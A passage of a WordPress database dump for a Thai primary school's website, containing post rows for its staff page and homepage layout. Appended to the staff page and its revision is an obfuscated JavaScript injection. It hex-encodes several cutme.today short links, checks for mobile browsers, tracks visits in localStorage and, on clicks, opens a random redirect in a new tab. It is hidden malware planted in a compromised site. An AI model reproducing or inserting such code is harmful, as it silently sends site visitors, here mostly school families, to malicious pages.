Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','คณะครู และบุคลากรทางการศึกษา','','publish','closed','closed','','%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%84%e0%b8%a3%e0%b8%b9-%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%a5%e0%b8%b2%e0%b8%81%e0%b8%a3%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3','','','2025-07-02 10:46:21','2025-07-02 03:46:21','',0,'http://pakhaeng.ssk.in.th/?page_id=605',0,'page','',0),
(606,1,'2024-08-07 10:16:47','2024-08-07 03:16:47','<!-- wp:shortcode -->\n[tmm name=\"%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%a5%e0%b8%b2%e0%b8%81%e0%b8%a3%e0%b9%83%e0%b8%99%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"]\n<!-- /wp:shortcode -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','คณะครู และบุคลากรทางการศึกษา','','inherit','closed','closed','','605-revision-v1','','','2024-08-07 10:16:47','2024-08-07 03:16:47','',605,'http://pakhaeng.ssk.in.th/?p=606',0,'revision','',0),
(608,1,'2024-08-07 10:17:09','2024-08-07 03:17:09','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลสิ่งก่อสร้าง</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":585,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-2.png\" alt=\"\" class=\"wp-image-585\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- 